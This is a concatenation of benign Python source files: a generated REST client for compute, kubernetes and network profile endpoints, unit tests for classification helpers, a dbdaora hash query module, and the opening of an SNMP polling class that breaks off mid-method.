        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method add_network_profile" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'body' is set
        if ('body' not in params or
                params['body'] is None):
            raise ValueError("Missing the required parameter `body` when calling `add_network_profile`")  # noqa: E501

        collection_formats = {}

        path_params = {}

        query_params = []

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        if 'body' in params:
            body_params = params['body']
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
            ['application/json'])  # noqa: E501

        # Authentication setting
        auth_settings = ['basicAuth', 'uaa']  # noqa: E501

        return self.api_client.call_api(
            '/network-profiles', 'POST',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type=None,  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)
def delete_compute_profile(self, profile_name, **kwargs): # noqa: E501
"""delete_compute_profile # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_compute_profile(profile_name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str profile_name: The compute profile name (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_compute_profile_with_http_info(profile_name, **kwargs) # noqa: E501
else:
(data) = self.delete_compute_profile_with_http_info(profile_name, **kwargs) # noqa: E501
return data
def delete_compute_profile_with_http_info(self, profile_name, **kwargs): # noqa: E501
"""delete_compute_profile # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_compute_profile_with_http_info(profile_name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str profile_name: The compute profile name (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['profile_name'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_compute_profile" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'profile_name' is set
if ('profile_name' not in params or
params['profile_name'] is None):
raise ValueError("Missing the required parameter `profile_name` when calling `delete_compute_profile`") # noqa: E501
collection_formats = {}
path_params = {}
if 'profile_name' in params:
path_params['profileName'] = params['profile_name'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth', 'uaa'] # noqa: E501
return self.api_client.call_api(
'/compute-profiles/{profileName}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_kubernetes_profile(self, name, **kwargs): # noqa: E501
"""delete_kubernetes_profile # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_kubernetes_profile(name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: The kubernetes profile name (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_kubernetes_profile_with_http_info(name, **kwargs) # noqa: E501
else:
(data) = self.delete_kubernetes_profile_with_http_info(name, **kwargs) # noqa: E501
return data
def delete_kubernetes_profile_with_http_info(self, name, **kwargs): # noqa: E501
"""delete_kubernetes_profile # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_kubernetes_profile_with_http_info(name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: The kubernetes profile name (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['name'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_kubernetes_profile" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in params or
params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `delete_kubernetes_profile`") # noqa: E501
collection_formats = {}
path_params = {}
if 'name' in params:
path_params['name'] = params['name'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth', 'uaa'] # noqa: E501
return self.api_client.call_api(
'/kubernetes-profiles/{name}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_network_profile(self, profile_name, **kwargs): # noqa: E501
"""delete_network_profile # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_network_profile(profile_name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str profile_name: The network profile name (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_network_profile_with_http_info(profile_name, **kwargs) # noqa: E501
else:
(data) = self.delete_network_profile_with_http_info(profile_name, **kwargs) # noqa: E501
return data
def delete_network_profile_with_http_info(self, profile_name, **kwargs): # noqa: E501
"""delete_network_profile # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_network_profile_with_http_info(profile_name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str profile_name: The network profile name (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['profile_name'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_network_profile" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'profile_name' is set
if ('profile_name' not in params or
params['profile_name'] is None):
raise ValueError("Missing the required parameter `profile_name` when calling `delete_network_profile`") # noqa: E501
collection_formats = {}
path_params = {}
if 'profile_name' in params:
path_params['profileName'] = params['profile_name'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth', 'uaa'] # noqa: E501
return self.api_client.call_api(
'/network-profiles/{profileName}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_compute_profile(self, profile_name, **kwargs): # noqa: E501
"""get_compute_profile # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_compute_profile(profile_name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str profile_name: The compute profile name (required)
:return: ComputeProfile
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_compute_profile_with_http_info(profile_name, **kwargs) # noqa: E501
else:
(data) = self.get_compute_profile_with_http_info(profile_name, **kwargs) # noqa: E501
return data
def get_compute_profile_with_http_info(self, profile_name, **kwargs): # noqa: E501
"""get_compute_profile # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_compute_profile_with_http_info(profile_name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str profile_name: The compute profile name (required)
:return: ComputeProfile
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['profile_name'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_compute_profile" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'profile_name' is set
if ('profile_name' not in params or
params['profile_name'] is None):
raise ValueError("Missing the required parameter `profile_name` when calling `get_compute_profile`") # noqa: E501
collection_formats = {}
path_params = {}
if 'profile_name' in params:
path_params['profileName'] = params['profile_name'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth', 'uaa'] # noqa: E501
return self.api_client.call_api(
'/compute-profiles/{profileName}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ComputeProfile', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_kubernetes_profile(self, name, **kwargs): # noqa: E501
"""get_kubernetes_profile # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_kubernetes_profile(name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: The kubernetes profile name (required)
:return: KubernetesProfile
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_kubernetes_profile_with_http_info(name, **kwargs) # noqa: E501
else:
(data) = self.get_kubernetes_profile_with_http_info(name, **kwargs) # noqa: E501
return data
def get_kubernetes_profile_with_http_info(self, name, **kwargs): # noqa: E501
"""get_kubernetes_profile # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_kubernetes_profile_with_http_info(name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: The kubernetes profile name (required)
:return: KubernetesProfile
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['name'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_kubernetes_profile" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in params or
params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `get_kubernetes_profile`") # noqa: E501
collection_formats = {}
path_params = {}
if 'name' in params:
path_params['name'] = params['name'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth', 'uaa'] # noqa: E501
return self.api_client.call_api(
'/kubernetes-profiles/{name}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='KubernetesProfile', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_network_profile(self, profile_name, **kwargs): # noqa: E501
"""get_network_profile # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_network_profile(profile_name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str profile_name: The network profile name (required)
:return: NetworkProfile
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_network_profile_with_http_info(profile_name, **kwargs) # noqa: E501
else:
(data) = self.get_network_profile_with_http_info(profile_name, **kwargs) # noqa: E501
return data
def get_network_profile_with_http_info(self, profile_name, **kwargs): # noqa: E501
"""get_network_profile # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_network_profile_with_http_info(profile_name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str profile_name: The network profile name (required)
:return: NetworkProfile
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['profile_name'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_network_profile" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'profile_name' is set
if ('profile_name' not in params or
params['profile_name'] is None):
raise ValueError("Missing the required parameter `profile_name` when calling `get_network_profile`") # noqa: E501
collection_formats = {}
path_params = {}
if 'profile_name' in params:
path_params['profileName'] = params['profile_name'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth', 'uaa'] # noqa: E501
return self.api_client.call_api(
'/network-profiles/{profileName}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='NetworkProfile', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def list_compute_profiles(self, **kwargs): # noqa: E501
"""List all compute profiles # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_compute_profiles(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: list[ComputeProfile]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.list_compute_profiles_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.list_compute_profiles_with_http_info(**kwargs) # noqa: E501
return data
def list_compute_profiles_with_http_info(self, **kwargs): # noqa: E501
"""List all compute profiles # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_compute_profiles_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: list[ComputeProfile]
If the method is called asynchronously,
returns the request thread.
"""
all_params = [] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method list_compute_profiles" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth', 'uaa'] # noqa: E501
return self.api_client.call_api(
'/compute-profiles', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[ComputeProfile]', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def list_kubernetes_profiles(self, **kwargs): # noqa: E501
"""List all kubernetes profiles # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_kubernetes_profiles(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: list[KubernetesProfile]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.list_kubernetes_profiles_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.list_kubernetes_profiles_with_http_info(**kwargs) # noqa: E501
return data
def list_kubernetes_profiles_with_http_info(self, **kwargs): # noqa: E501
"""List all kubernetes profiles # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_kubernetes_profiles_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: list[KubernetesProfile]
If the method is called asynchronously,
returns the request thread.
"""
all_params = [] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method list_kubernetes_profiles" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth', 'uaa'] # noqa: E501
return self.api_client.call_api(
'/kubernetes-profiles', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[KubernetesProfile]', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def list_network_profiles(self, **kwargs): # noqa: E501
"""List all network profiles # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_network_profiles(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: list[NetworkProfile]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.list_network_profiles_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.list_network_profiles_with_http_info(**kwargs) # noqa: E501
return data
def list_network_profiles_with_http_info(self, **kwargs): # noqa: E501
"""List all network profiles # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_network_profiles_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: list[NetworkProfile]
If the method is called asynchronously,
returns the request thread.
"""
all_params = [] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method list_network_profiles" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth', 'uaa'] # noqa: E501
return self.api_client.call_api(
'/network-profiles', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[NetworkProfile]', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| 37.744532 | 129 | 0.606138 | 42,797 | 0.992003 | 0 | 0 | 0 | 0 | 0 | 0 | 20,996 | 0.486672 |
0dcf49a2d7b38e623e09fc3e02b34c991f5df237 | 2,334 | py | Python | tests/test_utils.py | tesera/shclassify | 150a8ccfe0bd02a1510fa3bf9436b717ec427aff | [
"MIT"
] | null | null | null | tests/test_utils.py | tesera/shclassify | 150a8ccfe0bd02a1510fa3bf9436b717ec427aff | [
"MIT"
] | null | null | null | tests/test_utils.py | tesera/shclassify | 150a8ccfe0bd02a1510fa3bf9436b717ec427aff | [
"MIT"
] | null | null | null | import os
import pytest
import pandas as pd
import numpy as np
from shclassify.utils import (inverse_logit,
choose_from_multinomial_probs,
choose_from_binary_probs)
def test_inverse_logit():
    """inverse_logit(0) is the sigmoid midpoint."""
    expected = 0.5
    assert inverse_logit(0) == expected
def test_choose_from_multinomial_probs():
    """choose_from_multinomial_probs returns one known class per row."""
    n_obs = 3
    class_names = ['a', 'b', 'c']
    df = pd.DataFrame(
        np.random.uniform(size=(n_obs, len(class_names))),
        columns=class_names
    )
    chosen = choose_from_multinomial_probs(df)
    assert type(chosen) is pd.DataFrame
    assert chosen.shape == (n_obs, 1)
    assert chosen.columns == ['class']
    # Bug fix: the original helper `in_classes` never returned a value and
    # its `classes` default was shadowed by the result DataFrame, so the
    # membership assertion passed vacuously. `Series.isin` performs the
    # intended check explicitly.
    assert chosen['class'].isin(class_names).all()
def test_choose_from_multinomial_probs_with_bad_input():
    """A single-column frame is rejected with an informative ValueError."""
    single_class = ['a']
    frame = pd.DataFrame(
        np.random.uniform(size=(3, len(single_class))),
        columns=single_class
    )
    with pytest.raises(ValueError) as excinfo:
        choose_from_multinomial_probs(frame)
    assert 'Data frame must have more than 1 column' in str(excinfo.value)
def test_choose_from_binary_probs():
    """Binary probabilities map to exactly one of the two class labels."""
    n_obs = 3
    probs = pd.DataFrame(np.random.uniform(size=(n_obs, 1)))
    result = choose_from_binary_probs(probs, 'true', 'false')
    assert type(result) is pd.DataFrame
    assert result.shape == (n_obs, 1)
    # Every chosen value must be one of the two supplied labels.
    assert result.applymap(lambda value: value in ['true', 'false']).all()[0]
    assert result.columns == ['class']
def test_choose_from_binary_probs_with_bad_shape():
    """A multi-column frame is rejected for the binary chooser."""
    labels = ['a', 'b']
    frame = pd.DataFrame(
        np.random.uniform(size=(3, len(labels))), columns=labels
    )
    with pytest.raises(ValueError) as excinfo:
        choose_from_binary_probs(frame, 'true', 'false')
    assert 'Data frame must have 1 column' == str(excinfo.value)
def test_choose_from_binary_probs_with_bad_args():
    """Identical labels and out-of-range thresholds are both rejected."""
    probs = pd.DataFrame(np.random.uniform(size=(3, 1)))

    # The true/false labels must differ.
    with pytest.raises(ValueError) as excinfo:
        choose_from_binary_probs(probs, 'true', 'true')
    assert 'Class names for true and false results must differ' == str(excinfo.value)

    # The threshold must be a probability.
    with pytest.raises(ValueError) as excinfo:
        choose_from_binary_probs(probs, 'true', 'false', threshold=50)
    assert 'Threshold must be between 0 and 1' == str(excinfo.value)
| 28.120482 | 79 | 0.657241 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 262 | 0.112254 |
0dd00d6b1371d82e5dba287fb1ab84b4b728cdc5 | 2,111 | py | Python | dbdaora/hash/query.py | dutradda/sqldataclass | 5c87a3818e9d736bbf5e1438edc5929a2f5acd3f | [
"MIT"
] | 21 | 2019-10-14T14:33:33.000Z | 2022-02-11T04:43:07.000Z | dbdaora/hash/query.py | dutradda/sqldataclass | 5c87a3818e9d736bbf5e1438edc5929a2f5acd3f | [
"MIT"
] | null | null | null | dbdaora/hash/query.py | dutradda/sqldataclass | 5c87a3818e9d736bbf5e1438edc5929a2f5acd3f | [
"MIT"
] | 1 | 2019-09-29T23:51:44.000Z | 2019-09-29T23:51:44.000Z | import dataclasses
from typing import Any, ClassVar, List, Optional, Sequence, Tuple, Type, Union
from dbdaora.keys import FallbackKey
from dbdaora.query import BaseQuery, Query, QueryMany
from .repositories import HashData, HashEntity, HashRepository
@dataclasses.dataclass(init=False)
class HashQuery(Query[HashEntity, HashData, FallbackKey]):
    """Query for a single hash entity.

    Extends the generic ``Query`` with an optional ``fields`` restriction:
    when set, only that subset of the hash's fields is fetched.
    """

    repository: HashRepository[HashEntity, FallbackKey]
    # Subset of hash fields to fetch; None means "all fields".
    fields: Optional[Sequence[str]] = None

    def __init__(
        self,
        repository: HashRepository[HashEntity, FallbackKey],
        *args: Any,
        memory: bool = True,
        key_parts: Optional[List[Any]] = None,
        fields: Optional[Sequence[str]] = None,
        **kwargs: Any,
    ):
        """Build the query; extra args/kwargs are forwarded to Query."""
        # NOTE: positional *args intentionally follow the keyword arguments
        # in this call — they are appended after `repository`.
        super().__init__(
            repository, memory=memory, key_parts=key_parts, *args, **kwargs,
        )
        self.fields = fields
@dataclasses.dataclass(init=False)
class HashQueryMany(QueryMany[HashEntity, HashData, FallbackKey]):
    """Query for multiple hash entities at once.

    Each underlying single-entity query is a ``HashQuery``; the ``fields``
    restriction supplied here is propagated to every sub-query.
    """

    # Class of the per-entity queries built by QueryMany.
    query_cls: ClassVar[Type[HashQuery[HashEntity, FallbackKey]]] = HashQuery[
        HashEntity, FallbackKey
    ]
    queries: Sequence[HashQuery[HashEntity, FallbackKey]]  # type: ignore
    repository: HashRepository[HashEntity, FallbackKey]
    # Subset of hash fields to fetch; None means "all fields".
    fields: Optional[Sequence[str]] = None

    def __init__(
        self,
        repository: HashRepository[HashEntity, FallbackKey],
        *args: Any,
        many: List[Union[Any, Tuple[Any, ...]]],
        memory: bool = True,
        many_key_parts: Optional[List[List[Any]]] = None,
        fields: Optional[Sequence[str]] = None,
        **kwargs: Any,
    ):
        """Build the many-query and push `fields` down to each sub-query."""
        # NOTE: positional *args intentionally follow the keyword arguments
        # in this call — they are appended after `repository`.
        super().__init__(
            repository,
            memory=memory,
            many=many,
            many_key_parts=many_key_parts,
            *args,
            **kwargs,
        )
        self.fields = fields
        # super().__init__ created self.queries; apply the field filter to
        # every per-entity query so all fetches honour it.
        for query in self.queries:
            query.fields = fields
def make(
    *args: Any, **kwargs: Any
) -> BaseQuery[HashEntity, HashData, FallbackKey]:
    """Build a hash query, choosing the many-entity variant when either
    `many` or `many_key_parts` is supplied (and truthy)."""
    wants_many = kwargs.get('many') or kwargs.get('many_key_parts')
    query_cls = HashQueryMany if wants_many else HashQuery
    return query_cls(*args, **kwargs)
| 30.157143 | 78 | 0.639981 | 1,544 | 0.731407 | 0 | 0 | 1,614 | 0.764567 | 0 | 0 | 36 | 0.017054 |
0dd0d2e19f18724ff736d3e77f451b5b939ad9d4 | 20,104 | py | Python | pattoo_agents/snmp/snmp.py | palisadoes/pattoo-agents | d73453ceac1747573dfbcad4da724325e86b208d | [
"Apache-2.0"
] | null | null | null | pattoo_agents/snmp/snmp.py | palisadoes/pattoo-agents | d73453ceac1747573dfbcad4da724325e86b208d | [
"Apache-2.0"
] | null | null | null | pattoo_agents/snmp/snmp.py | palisadoes/pattoo-agents | d73453ceac1747573dfbcad4da724325e86b208d | [
"Apache-2.0"
] | null | null | null | """Module used polling SNMP enabled targets."""
import sys
# PIP3 imports
import easysnmp
from easysnmp import exceptions
# Import Pattoo libraries
from pattoo_shared import log
from pattoo_shared.variables import DataPoint
from pattoo_shared.constants import (
DATA_INT, DATA_COUNT64, DATA_COUNT, DATA_STRING, DATA_NONE)
from pattoo_agents.snmp import oid as class_oid
from pattoo_agents.snmp.variables import SNMPVariable
class SNMP():
"""Class to interact with targets using SNMP."""
def __init__(self, snmpvariable):
"""Initialize the class.
Args:
snmpvariable: SNMPVariable object
Returns:
None
"""
# Initialize key variables
self._snmp_ip_target = snmpvariable.ip_target
self._snmp_version = snmpvariable.snmpauth.version
self._snmpvariable = snmpvariable
    def contactable(self):
        """Check if the target is contactable via SNMP.

        The target is considered contactable when its sysObjectID can be
        polled successfully. All failures are logged and reported as
        "not contactable" rather than raised to the caller.

        Args:
            None

        Returns:
            _contactable: True if the target responded to the SNMP poll

        """
        # Define key variables
        _contactable = False
        result = None
        # Get target data
        target_name = self._snmp_ip_target
        # Try to reach target
        try:
            # If we can poll the SNMP sysObjectID,
            # then the target is contactable
            result = self.sysobjectid(check_reachability=True)
            if bool(result) is True:
                _contactable = True
        except Exception as exception_error:
            # Not contactable
            _contactable = False
            # Log a message
            log_message = ('''\
Unable to access target {} via SNMP. Make sure target is contactable and \
that the database\'s SNMP parameters for the target are correct. Fix, repeat \
your command AND make sure you set --.valid=True. Error: {}\
'''.format(target_name, exception_error))
            log.log2see(51035, log_message)
        except:
            # Not contactable. This bare except only fires for
            # non-Exception BaseExceptions that slip past the handler above.
            _contactable = False
            # Log a message
            log_message = (
                'Unexpected SNMP error for target {}'
                ''.format(target_name))
            log.log2see(51036, log_message)
        # Return
        return _contactable
def sysobjectid(self, check_reachability=False):
"""Get the sysObjectID of the target.
Args:
check_reachability:
Set if testing for connectivity. Some session
errors are ignored so that a null result is returned
Returns:
object_id: sysObjectID value
"""
# Initialize key variables
oid = '.1.3.6.1.2.1.1.2.0'
object_id = None
# Get sysObjectID
results = self.get(oid, check_reachability=check_reachability)
if bool(results) is True:
object_id = results
# Return
return object_id
def oid_exists(self, oid_to_get, context_name=''):
"""Determine existence of OID on target.
Args:
oid_to_get: OID to get
context_name: Set the contextName used for SNMPv3 messages.
The default contextName is the empty string "". Overrides the
defContext token in the snmp.conf file.
Returns:
validity: True if exists
"""
# Initialize key variables
validity = False
# Process
